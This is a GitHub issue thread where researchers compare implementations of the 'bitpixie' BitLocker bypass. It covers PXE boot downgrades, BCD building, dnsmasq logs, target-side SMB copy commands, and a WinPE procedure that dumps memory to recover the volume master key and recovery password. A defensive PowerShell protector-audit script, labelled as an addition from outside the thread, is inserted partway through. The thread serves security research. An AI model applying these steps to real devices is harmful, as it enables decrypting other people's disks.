
Alternative implementation, public source of Windows boot manager?

Open martanne opened this issue 10 months ago • 16 comments

Hi,

Great work, thanks for spending time on a public PoC.

I did the same last week when this repository was not yet in a working state.

Over time the repositories diverged completely, main differences seem to be:

  • I build the initramfs using a stripped down version of Frood, in the hope that this is a more "complete" system, possibly helping to avoid issues like #6.
  • The Linux exploit used tries to make the fewest changes necessary.
  • You seem to want to construct the BCD using Linux tooling; what advantage do you see in this approach? My approach uses the native Windows bcdedit tooling which is part of the recovery environment.
  • I try to avoid committing BLOBs to the repo and instead download them from public sources. For example, it was not 100% clear to me which GRUB file from the Debian package you are actually using. Related, do you have a convenient public source for the Windows boot manager? I did not find it in Winbindex.

I have pushed my current code base to: https://github.com/martanne/bitpixie

So far I did try it on 1 laptop and it seemed to work. Would be interested in real-world experiences from others.

Hope it is useful for somebody out there.

martanne avatar Feb 03 '25 13:02 martanne

This exploit is in effect a new family. Many different exploitations are possible after abusing the BCD. Th0mas also stated that his approach lacked hindsight and was more of a "fix issues as they come". So using other initramfs could in fact even be better. Whether this could be merged is something the author has to decide.

The grub really doesn't matter... you can use any from Debian Buster to Bookworm.

Since winbindex removed all the old bootloaders I grabbed mine from an iso build with https://uupdump.net/

code1997 avatar Feb 03 '25 13:02 code1997

Nice! I'll take a look at it as soon as possible, however at the moment I'm a bit exhausted from all the initramfs-building and trial-and-error booting :D I like your approach, some thoughts about your points:

  • I tried to build a minimal initramfs as the booting times are sometimes very long, so I wanted to get the image as small as possible; however, as you mentioned, this might lead to various problems on different systems. I will try to test it on as many systems as possible.
  • I'm trying to construct the BCD file on the attacker machine mainly for two reasons: I want to type as few characters as possible on the target machine (no copy&paste and I'm a lazy guy) and I wanted to do some research just out of curiosity.
  • Sadly, the bootloader isn't available on Winbindex anymore. Similar to @code1997 I downloaded an old Windows ISO and extracted the bootloader (& compared the hash with Winbindex ;) ).

andigandhi avatar Feb 03 '25 14:02 andigandhi

In principle I share your preference to avoid needless typing. However, in this particular case it does not seem that bad. The required commands are basically:

wpeutil initializenetwork
net use S: \\10.13.37.100\smb
cd %TEMP%
copy S:\create-bcd.bat .
.\create-bcd.bat
copy BCD_modded S:\BCD
exit

On the plus side the native tooling should always be compatible even if they for some reason decide to change the format etc.

Too bad about bootmgfw.efi I hoped for a more convenient option.

martanne avatar Feb 03 '25 15:02 martanne

On the plus side the native tooling should always be compatible even if they for some reason decide to change the format etc.

I completely agree that the Linux version is more prone to errors, but I think if the BCD format were to change for some reason, the old Windows Boot Manager version would also not be able to read the new version.

andigandhi avatar Feb 03 '25 21:02 andigandhi

So far I did try it on 1 laptop and it seemed to work. Would be interested in real-world experiences from others.

I could successfully use it on a Fujitsu Stylistic tablet computer. But I have issues running it on a Microsoft Surface Pro 8, maybe Surfaces are better protected.

It seems that the Surface wants a lot more files:

dnsmasq: gestartet, Version 2.90, Cachegröße 150
dnsmasq: Übersetzungsoptionen: IPv6 GNU-getopt DBus no-UBus i18n IDN2 DHCP DHCPv6 no-Lua TFTP conntrack ipset nftset auth cryptohash DNSSEC loop-detect inotify dumpfile
dnsmasq-dhcp: DHCP, IP range 10.13.37.100 -- 10.13.37.101, lease time 1h
dnsmasq-tftp: TFTP Wurzel ist /home/xxx/bitpixie/PXE-Server
dnsmasq: lese /etc/resolv.conf
dnsmasq: Benutze Namensserver 127.0.0.53#53
dnsmasq: read /etc/hosts - 8 names
dnsmasq-dhcp: DHCPDISCOVER(enp8s0) 00:24:32:XX:XX:XX
dnsmasq-dhcp: DHCPOFFER(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX
dnsmasq-dhcp: DHCPREQUEST(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX
dnsmasq-dhcp: DHCPACK(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX
dnsmasq-tftp: error 8 User aborted the transfer received from 10.13.37.101
dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/bootmgfw.efi to 10.13.37.101
dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/bootmgfw.efi to 10.13.37.101
dnsmasq-tftp: error 0 TFTP Aborted received from 10.13.37.101
dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/Boot/BCD to 10.13.37.101
dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/Boot/BCD to 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/Policies/SbcpFlightToken.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SecureBootPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SkuSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/WinSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/ATPSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SkuSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/WinSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/ATPSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SkuSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/WinSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/ATPSiPolicy.p7b not found for 10.13.37.101
dnsmasq-tftp: error 0 TFTP Aborted received from 10.13.37.101
dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/bootmgfw.efi to 10.13.37.101
dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/bootmgfw.efi to 10.13.37.101
dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/boot.stl not found for 10.13.37.101
dnsmasq-dhcp: DHCPINFORM(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX
dnsmasq-dhcp: DHCPACK(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX
Surface

netaddict avatar Feb 03 '25 21:02 netaddict

@martanne German notebooks and recovery (that defaults to English) is a pain for us...

@netaddict the additional files do not matter... the problem is that the shim is not requested... Does the Surface display any errors? Did you check the bitlocker protectors as described in the prerequisites? Did you try manually building the BCD? We need more info to investigate this

code1997 avatar Feb 03 '25 22:02 code1997

Be careful with the surface: By default it doesn't allow the "Microsoft Corporation UEFI CA 2011" Certificate which they use to sign 3rd party stuff such as shim loaders for linux.

BUT: If you enable it, you will change PCR7, and even if you disable it again, you won't get back to the previous PCR7 value and lose access to your BitLocker key in TPM. If you want to bitpixie attack a surface, you need to build a WinPE and do the RAM Dump in there, as this is the only thing that boots on a surface device by default.

But it's actually weird: It doesn't show any load for the shim. Maybe PXE checks the signature as soon as the PE header is complete and if it fails, it rejects the transfer. This would at least explain the entries: dnsmasq-tftp: error 0 TFTP Aborted received from 10.13.37.101. Other entries state: dnsmasq-tftp: sent, which indicates a complete file transfer, so we don't see the request because it's aborted before the full file has been sent to the device. Wild assumptions... Maybe you just send the bootmgfw.efi again as shim.efi just to check if it requests the file completely. A Wireshark trace would also be very interesting here...

pascal-gujer avatar Feb 03 '25 22:02 pascal-gujer
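A defender-side check that follows from the PCR7 caveat above, as an added example that is not part of this thread or of the bitpixie repository: it lists the BitLocker key protectors of each OS volume, flags a TPM protector that has no PIN or startup key, reports whether a recovery password exists, and reads the PCR validation profile from manage-bde so you know whether PCR7 is part of the sealing policy before touching Secure Boot settings. It assumes an elevated PowerShell session and that manage-bde prints a "PCR Validation Profile:" line followed by the PCR numbers (the regex is a heuristic on that output).

```powershell
# Added example, not from the bitpixie repo: inventory BitLocker protectors on OS volumes.
# Assumes an elevated session; manage-bde output parsing is heuristic (see lead-in).
function Get-OsVolumeProtectorReport {
    $report = @()
    $osVolumes = Get-BitLockerVolume | Where-Object { $_.VolumeType -eq 'OperatingSystem' }
    foreach ($vol in $osVolumes) {
        # Protector types as reported by the BitLocker module, e.g. Tpm, TpmPin, RecoveryPassword
        $types = @($vol.KeyProtector | ForEach-Object { $_.KeyProtectorType })

        # Get-BitLockerVolume does not expose the PCR profile; manage-bde does.
        $text = (& manage-bde.exe -protectors -get $vol.MountPoint 2>&1) -join "`n"
        $pcrs = $null
        if ($text -match 'PCR Validation Profile:\s*(\d[\d,\s]*)') {
            $pcrs = @($Matches[1] -split '[,\s]+' | Where-Object { $_ }) -join ','
        }

        # A TPM protector without PIN/startup key releases the VMK on a PCR match alone.
        $authTpm = @($types | Where-Object { $_ -in 'TpmPin', 'TpmStartupKey', 'TpmPinStartupKey' })
        $tpmOnly = ($types -contains 'Tpm') -and ($authTpm.Count -eq 0)

        $note = 'ok'
        if ($tpmOnly) { $note = 'TPM-only protector: boot-chain downgrade unseals VMK; consider TPM+PIN' }
        if (-not ($types -contains 'RecoveryPassword')) {
            $note += '; no recovery password: escrow one before any Secure Boot/PCR7 change'
        }

        $report += [pscustomobject]@{
            Volume           = $vol.MountPoint
            ProtectionStatus = $vol.ProtectionStatus
            Protectors       = ($types -join ', ')
            TpmWithoutAuth   = $tpmOnly
            HasRecoveryPass  = ($types -contains 'RecoveryPassword')
            PcrProfile       = $pcrs          # e.g. "7,11" when Secure Boot state is sealed in
            Note             = $note
        }
    }
    return $report
}

Get-OsVolumeProtectorReport | Format-List
```

If PcrProfile lists 7, any change to the Secure Boot database (such as enrolling the third-party UEFI CA) changes the sealing policy and the TPM will no longer release the key, exactly the failure mode described in the comment above.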

@pascal-gujer that would have been my second hunch, but the request for the shim not showing in the log tripped me up. Thanks for pointing it out in detail! A wireshark dump would indeed be of interest here. And maybe we should start a section in the readme on how to troubleshoot / common issues.

code1997 avatar Feb 03 '25 22:02 code1997

Short update from my side: I successfully tested my repository on these devices after manually enabling the TCP stack in the UEFI settings:

  • Lenovo ThinkPad T460s 20FAA01100
  • Lenovo ThinkPad X280 20KES6C42B, this is a device provided by @pascal-gujer in his course last week

martanne avatar Feb 06 '25 10:02 martanne

@martanne Nice! Sorry, I did not find the time to test your exploit yet, I'll try to test it today after work on a Dell Notebook running Windows 11 24H2

andigandhi avatar Feb 06 '25 11:02 andigandhi

@martanne we completely reworked the build process of this repo and took some inspiration from yours :) Thanks for your work on this!

code1997 avatar Feb 18 '25 07:02 code1997

Hi, short status update from my side.

In order to also support machines which do not trust the Microsoft 3rd party certificate used to sign the Linux shim (as mentioned by @pascal-gujer above), I developed a WinPE-based approach:

  1. Provide a BCD with pxesoftreboot pointing to the same boot manager served under a different name, see create-bcd-winpe1.bat
  2. Switch out the served BCD to one pointing to a WinPE image with associated ramdisk from a Windows 11 installation ISO, see create-bcd-winpe2.bat
  3. Take a full memory dump using Magnet DumpIt for Windows
  4. Scan the memory dump for the VMK structures using a search-vmk.exe utility
  5. Use a minimal Windows port of the dislocker-metadata utility to decrypt the human readable recovery password stored in the BitLocker metadata
  6. Unlock the disk using native tooling e.g. manage-bde.exe

This works in principle, but currently seems to be less reliable than the Linux-based exploitation approach.

Maybe the experts involved in this thread have ideas about what the issue could be or how the reliability of the procedure could be improved?

See also my other comment for a possible debugging approach (maybe there are more efficient options?) and a screenshot of a successful execution.

martanne avatar Mar 18 '25 07:03 martanne

Hi, I saw your work yesterday - amazing! I have already built all the binaries and will try to run the exploit today as soon as I have a USB flash drive to hand :D

Is there a reason why you dump the full memory and then scan it? I did some small tests with a modified version of WinPmem-Scanner and had some very promising results. It uses a signed driver to scan the physical memory, the needle search algorithm can be easily implemented in the userland application.

andigandhi avatar Mar 18 '25 08:03 andigandhi

Looking forward to your experience.

No concrete reasons for the full dump. I agree that in principle an in-memory scan would be preferable.

I briefly looked at their README, didn't see a mention of Windows 11, saw that they no longer distribute (newly?) signed drivers, thought cross-compilation might be difficult and then decided that for development a full dump might be handy for offline analysis.

But yes, it shouldn't be too difficult to integrate. Might give it a try later on ...

martanne avatar Mar 18 '25 11:03 martanne

With the latest commits of my repository a custom version of WinPmem is used. It just now worked on my test machine, but the sample size is 1. More testing would be welcome.

martanne avatar Mar 18 '25 20:03 martanne

Hey! For what it's worth, I finally made my implementation public, which I put together around the same time as you two @andigandhi and @martanne. It is also based on Thomas' article and is basically the same as you did, with the same kernel exploit (though I am thinking of trying out a different one to see how it goes, because that exploit was specifically made to be unstable to avoid malicious use). I have not had success on all the devices I've tested, so maybe we could work together to improve our success rate. Cheers!

https://github.com/garatc/DeviceDecryption

garatc avatar Jun 15 '25 18:06 garatc